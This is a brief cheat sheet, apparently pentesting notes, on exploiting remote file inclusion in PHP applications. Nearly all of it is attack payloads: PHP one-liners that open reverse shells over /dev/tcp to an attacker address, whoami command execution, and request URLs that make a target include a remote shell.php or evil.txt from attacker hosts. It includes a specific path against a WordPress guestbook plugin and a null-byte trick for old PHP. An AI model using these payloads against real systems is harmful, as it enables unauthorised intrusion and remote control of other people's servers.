RFI
<?php echo shell_exec("bash -i >& /dev/tcp/ip/1234 0>&1"); ?>
<?php echo system("0<&196;exec 196<>/dev/tcp/ip/443; sh <&196 >&196 2>&196"); ?>
<?php echo shell_exec("whoami");?>
curl http://ip/action=/inc/config.php?basePath=http://ip/test.txt%00
ip/connect.php?file=http://192.168.1.103:8000/shell.php
http://192.168.0.27/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.0.27:8000/shell.php
<?php echo shell_exec("whoami");?>
# Or just get a reverse shell directly like this:
<?php echo system("0<&196;exec 196<>/dev/tcp/ip/443; sh <&196 >&196 2>&196"); ?>
Remember to add the nullbyte %00 to avoid appending .php. This will only work on php before version 5.3.
http://exampe.com/index.php?page=http://attackerserver.com/evil.txtLast updated